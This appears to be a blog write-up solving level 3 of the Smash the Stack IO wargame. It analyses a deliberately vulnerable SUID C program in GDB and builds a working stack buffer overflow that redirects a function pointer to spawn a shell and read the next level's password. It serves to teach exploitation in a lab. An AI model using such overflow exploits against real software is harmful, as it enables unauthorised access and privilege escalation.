For the third level of Smash the Stack (IO), we are given both the source code and a binary to work with. As always, we will use the password obtained in the previous writeup to log in to the server as 'level3'. Let's take a look and see if we can find a way to extract the password for level 4.
Analyzing Level 3
As noted, we are given both the source code (level03.c), and a corresponding binary (level03). Let's start analysis by dissecting the source code:
level3@io:/levels$ cat level03.c
//bla, based on work by beach
#include <stdio.h>
#include <string.h>
void good()
{
    puts("Win.");
    execl("/bin/sh", "sh", NULL);
}
void bad()
{
    printf("I'm so sorry, you're at %p and you want to be at %p\n", bad, good);
}
int main(int argc, char **argv, char **envp)
{
    void (*functionpointer)(void) = bad;
    char buffer[50];
    if(argc != 2 || strlen(argv[1]) < 4)
        return 0;
    memcpy(buffer, argv[1], strlen(argv[1]));
    memset(buffer, 0, strlen(argv[1]) - 4);
    printf("This is exciting we're going to %p\n", functionpointer);
    functionpointer();
    return 0;
}
Immediately, we can see that we want to find some way to execute the 'good' function, as it spawns a shell which would give us level4 permissions since this is a SUID binary. It appears as though the 'bad' function, when executed, will give us a memory location we 'are at', as well as the memory location of the good function - where we want to be.
Moving on to the main function, we can see that we start by allocating a function pointer which points to the address of the 'bad' function. We can reason that we want to find some way to make the function pointer point to the 'good' function instead of the 'bad' function. We then create a 50 byte character array called 'buffer'.
After these two local variables have been created, we see our typical check for the appropriate number of arguments (in this case checking to see if we have provided one argument), and then we note that the program ensures that the length of our argument is >= 4. Otherwise, the program returns 0 and exits.
Assuming we pass the 'usage check' by providing one argument with length >= 4, the program then calls the memcpy function. By reading documentation on the function, we see that this call will copy strlen(our_argument) bytes from our argument into the buffer. After this, the program calls the memset function, which sets the first strlen(our_argument) - 4 bytes of buffer to 0, so only the last four bytes we copied survive. The program then prints out the address our functionpointer is pointing to, and calls the function at that address. We can see that somewhere before this call, we need to find a way to change the address functionpointer points to.
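To make the memcpy/memset pair concrete, here is a minimal sketch in Python that models what happens to the buffer for an argument that fits inside it. The function name simulate_main and the '?' filler bytes are made up for illustration (the real buffer starts out holding whatever happened to be on the stack), and the sketch assumes Python 3.

```python
def simulate_main(arg: bytes, buffer_size: int = 50) -> bytearray:
    """Model memcpy followed by memset for an argument that fits in the buffer."""
    if len(arg) < 4 or len(arg) > buffer_size:
        raise ValueError("this model only covers in-bounds arguments of length >= 4")
    # '?' is an arbitrary stand-in for the uninitialized contents of the real buffer.
    buffer = bytearray(b"?" * buffer_size)
    n = len(arg)                   # strlen(argv[1])
    buffer[:n] = arg               # memcpy(buffer, argv[1], n)
    buffer[:n - 4] = bytes(n - 4)  # memset(buffer, 0, n - 4)
    return buffer


result = simulate_main(b"ABCDEFGH")
print(result[:8])  # the first four bytes are zeroed, "EFGH" survives
```

The takeaway is that whatever we pass in, only its final four bytes are left untouched by the time the function pointer is called.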
To investigate, let's take a look at what we think our stack should look like before the memcpy function is called. Remember, the stack grows from high memory addresses to lower addresses.
The key thing to know about memcpy (and many other similar functions such as strcpy()) is that it writes from low to high addresses. With this being the case, the data written to buffer is written towards our function pointer. Another key thing to know is that these functions do not check that the data being written can actually fit in the destination: memcpy copies exactly as many bytes as it is told to, and strcpy copies until it reaches a null byte. This lack of checking keeps the functions fast and simple, but it can be dangerous.
Let's go back to our code to see why.
memcpy(buffer, argv[1], strlen(argv[1]));
We can see that the number of bytes we copy into the buffer depends only on the size of our input. The program does not check that our input fits within the 50 bytes of the buffer. Instead, if we provide more data than the buffer can hold, memcpy simply keeps overwriting adjacent memory until our entire argument has been copied. With this being the case, we can control what data is written into 'functionpointer'. This is an example of a stack-based buffer overflow. Let's take a closer look with our debugger to see how we can exploit this vulnerability:
level3@io:~$ gdb -q /levels/level03
Reading symbols from /levels/level03...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080484c8 <main+0>: push ebp
0x080484c9 <main+1>: mov ebp,esp
0x080484cb <main+3>: sub esp,0x78
0x080484ce <main+6>: and esp,0xfffffff0
0x080484d1 <main+9>: mov eax,0x0
0x080484d6 <main+14>: sub esp,eax
0x080484d8 <main+16>: mov DWORD PTR [ebp-0xc],0x80484a4
0x080484df <main+23>: cmp DWORD PTR [ebp+0x8],0x2
0x080484e3 <main+27>: jne 0x80484fc <main+52>
0x080484e5 <main+29>: mov eax,DWORD PTR [ebp+0xc]
0x080484e8 <main+32>: add eax,0x4
0x080484eb <main+35>: mov eax,DWORD PTR [eax]
0x080484ed <main+37>: mov DWORD PTR [esp],eax
0x080484f0 <main+40>: call 0x804839c <strlen@plt>
0x080484f5 <main+45>: cmp eax,0x3
0x080484f8 <main+48>: jbe 0x80484fc <main+52>
0x080484fa <main+50>: jmp 0x8048505 <main+61>
0x080484fc <main+52>: mov DWORD PTR [ebp-0x5c],0x0
0x08048503 <main+59>: jmp 0x8048579 <main+177>
0x08048505 <main+61>: mov eax,DWORD PTR [ebp+0xc]
0x08048508 <main+64>: add eax,0x4
0x0804850b <main+67>: mov eax,DWORD PTR [eax]
0x0804850d <main+69>: mov DWORD PTR [esp],eax
0x08048510 <main+72>: call 0x804839c <strlen@plt>
0x08048515 <main+77>: mov DWORD PTR [esp+0x8],eax
0x08048519 <main+81>: mov eax,DWORD PTR [ebp+0xc]
0x0804851c <main+84>: add eax,0x4
0x0804851f <main+87>: mov eax,DWORD PTR [eax]
0x08048521 <main+89>: mov DWORD PTR [esp+0x4],eax
0x08048525 <main+93>: lea eax,[ebp-0x58]
0x08048528 <main+96>: mov DWORD PTR [esp],eax
0x0804852b <main+99>: call 0x804838c <memcpy@plt>
0x08048530 <main+104>: mov eax,DWORD PTR [ebp+0xc]
0x08048533 <main+107>: add eax,0x4
0x08048536 <main+110>: mov eax,DWORD PTR [eax]
0x08048538 <main+112>: mov DWORD PTR [esp],eax
0x0804853b <main+115>: call 0x804839c <strlen@plt>
0x08048540 <main+120>: sub eax,0x4
0x08048543 <main+123>: mov DWORD PTR [esp+0x8],eax
0x08048547 <main+127>: mov DWORD PTR [esp+0x4],0x0
0x0804854f <main+135>: lea eax,[ebp-0x58]
0x08048552 <main+138>: mov DWORD PTR [esp],eax
0x08048555 <main+141>: call 0x804835c <memset@plt>
0x0804855a <main+146>: mov eax,DWORD PTR [ebp-0xc]
0x0804855d <main+149>: mov DWORD PTR [esp+0x4],eax
0x08048561 <main+153>: mov DWORD PTR [esp],0x80486c0
0x08048568 <main+160>: call 0x80483ac <printf@plt>
0x0804856d <main+165>: mov eax,DWORD PTR [ebp-0xc]
0x08048570 <main+168>: call eax
0x08048572 <main+170>: mov DWORD PTR [ebp-0x5c],0x0
0x08048579 <main+177>: mov eax,DWORD PTR [ebp-0x5c]
0x0804857c <main+180>: leave
0x0804857d <main+181>: ret
End of assembler dump.
We aren't going to pick this entire disassembled program apart, as it would take an entire blog post by itself (though there might be one in the future if it is requested). However, what we want to do is see how our stack is structured, as well as verify our theory that memory will be written from low to high addresses. Let's put a breakpoint right after the memcpy function is executed, run the program with the argument 'AAAAA', and see what we find.
(gdb) break *0x08048530
Breakpoint 1 at 0x8048530
(gdb) run AAAAA
Starting program: /levels/level03 AAAAA
Breakpoint 1, 0x08048530 in main ()
(gdb)
(gdb) x/32xw $esp
0xbfffdc60: 0xbfffdc80 0xbfffde96 0x00000005 0x00000001
0xbfffdc70: 0x00000000 0x00000001 0x009e38f8 0x00fccff4
0xbfffdc80: 0x41414141 0x00eb9341 0xbfffdc98 0x00ea0aa5
0xbfffdc90: 0x00fccff4 0x080497c8 0xbfffdca8 0x08048338
0xbfffdca0: 0x009d5380 0x080497c8 0xbfffdcd8 0x080485a9
0xbfffdcb0: 0x00fcd304 0x00fccff4 0x08048590 0xbfffdcd8
0xbfffdcc0: 0x00eb95c5 0x009d5380 0x0804859b 0x080484a4
0xbfffdcd0: 0x08048590 0x00000000 0xbfffdd58 0x00ea0ca6
(gdb) print 0xbfffdccc - 0xbfffdc80
$1 = 76
From this dump, we can tell that the values are being copied from lower addresses to higher addresses: the first four 'A's (0x41) fill the word at 0xbfffdc80, where our buffer starts, and the fifth lands in the lowest byte of the next word at 0xbfffdc84. We then need to find out how many bytes it would take to overwrite our function pointer (as it's not always going to be exactly the length of the buffer + length of the function pointer since the compiler may add some padding). To do this, we first need to find the address of our function pointer. Then, we can subtract our buffer starting address from this to obtain the number of bytes between the two that we need to overwrite before we can change the contents of the function pointer.
We can find the address of the function pointer in two ways:
- Use our GDB disassembly
- Run the program (as it will tell us the address of our function pointer)
For the sake of comprehension, let's do both:
Analysis with GDB:
0x080484d8 <main+16>: mov DWORD PTR [ebp-0xc],0x80484a4
<trim>
0x0804856d <main+165>: mov eax,DWORD PTR [ebp-0xc]
0x08048570 <main+168>: call eax
We can see at the beginning of our program that we load the address of a function into one of our local variables (at [ebp-0xc]). Then, at the end of our program, we load this value into eax and call the function located at that address. We can use this information to deduce that our function pointer contains the address 0x80484a4.
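The disassembly also lets us work out the distance between the two locals without running anything. As a rough cross-check (a sketch, not part of the original session), the snippet below takes the buffer offset from the 'lea eax,[ebp-0x58]' passed to memcpy and the function pointer offset from '[ebp-0xc]', then compares the result with the two stack addresses from the GDB dump above. The variable names are made up for illustration.

```python
# Offsets below ebp, read from the disassembly of main.
BUFFER_OFFSET = 0x58    # lea eax,[ebp-0x58]  -> start of buffer
POINTER_OFFSET = 0x0c   # mov eax,DWORD PTR [ebp-0xc]  -> functionpointer

# Bytes between the start of the buffer and the function pointer.
padding_from_offsets = BUFFER_OFFSET - POINTER_OFFSET

# Same distance using the runtime addresses from the x/32xw dump.
padding_from_addresses = 0xbfffdccc - 0xbfffdc80

print(padding_from_offsets, padding_from_addresses)  # 76 76
```

Both approaches agree with the 76 that GDB printed earlier.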
Analysis by Running the Program:
If we run the program without overwriting the contents of the function pointer, we will see its contents.
level3@io:~$ /levels/level03 AAAAA
This is exciting we're going to 0x80484a4
I'm so sorry, you're at 0x80484a4 and you want to be at 0x8048474
As was the case with our GDB analysis, our function pointer appears to contain the address 0x80484a4. We can then use this knowledge to find the address at which our function pointer resides. Referring back to our stack output, we can see that the start of our function pointer occurs at the address 0xbfffdccc. If we subtract the starting address of our buffer, we see that there are 76 bytes that we need to fill with garbage before we can access the contents of the function pointer. Let's verify that real quick. As a side note, typing out 76 'A's can be exhausting, so let's let scripting do the work for us. We can print 76 'A's using Python with the following command:
python -c 'print "A"*76'
Then, if we wrap the command inside $(command), our program will use the output of the command as its first argument. This can be invaluable in crafting exploits.
(gdb) run $(python -c 'print "A"*76')
Starting program: /levels/level03 $(python -c 'print "A"*76')
Breakpoint 1, 0x08048530 in main ()
(gdb) x/32xw $esp
0xbfffdc20: 0xbfffdc40 0xbfffde50 0x0000004c 0x00000001
0xbfffdc30: 0x00000000 0x00000001 0x0084f8f8 0x00274ff4
0xbfffdc40: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc50: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc60: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc70: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc80: 0x41414141 0x41414141 0x41414141 0x080484a4
0xbfffdc90: 0x08048590 0x00000000 0xbfffdd18 0x00148ca6
Perfect. As we suspected, we have overwritten everything up to the start of the function pointer, which still holds 0x080484a4. Now we just need to overwrite the contents of the function pointer with the correct address (that of the 'good' function, 0x8048474). However, one thing to remember is that x86 processors store data in little-endian byte order, with the least significant byte at the lowest address. Therefore, we need to write the bytes of the address in reverse order so that they are stored correctly.
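If reversing the bytes by hand feels error-prone, Python's struct module can do it for us. The sketch below assumes Python 3 (the commands in this writeup use Python 2's print statement) and uses the address of 'good' that the program printed; the 80-byte frame is only a simplified model of the region from the start of the buffer through the function pointer, not the real stack.

```python
import struct

GOOD_ADDRESS = 0x08048474  # address of good(), as printed by the program
PADDING = 76               # bytes between the start of buffer and functionpointer

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
packed = struct.pack("<I", GOOD_ADDRESS)
payload = b"A" * PADDING + packed
print(packed.hex())  # 74840408

# Simplified model of the stack region: 76 bytes up to the pointer, then the pointer.
frame = bytearray(PADDING + 4)
n = len(payload)               # strlen(argv[1]); the payload contains no null bytes
frame[:n] = payload            # memcpy(buffer, argv[1], n)
frame[:n - 4] = bytes(n - 4)   # memset(buffer, 0, n - 4)

# Read the function pointer back the way the CPU would.
pointer = struct.unpack("<I", frame[PADDING:PADDING + 4])[0]
print(hex(pointer))  # 0x8048474
```

Note that the memset call wipes out all of our padding but leaves the last four bytes alone, which are exactly the bytes sitting in the function pointer.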
Crafting the Final Exploit
As done previously, we will use Python to fill the first 76 bytes, and then we will overwrite the function pointer with the correct address. Our final exploit will look like this:
./level03 $(python -c 'print "A"*76 + "\x74\x84\x04\x08"')
Let's run it and see what happens:
level3@io:~$ cd /levels/
level3@io:/levels$ ./level03 $(python -c 'print "A"*76 + "\x74\x84\x04\x08"')
This is exciting we're going to 0x8048474
Win.
sh-4.1$ whoami
level4
sh-4.1$ cat /home/level4/.pass
766ShzwZAUbf4g
Awesome. Just as we expected, we overwrote the function pointer and called the 'good' function, resulting in our shell. I hope this helped, and as always, if you ever have any questions or comments, leave them below!
-Jordan
I was going to do an article on this too.. =)
I do have a question however, the size of the buffer should be 50 but it appears to be 76, why does gcc add this much padding ? :/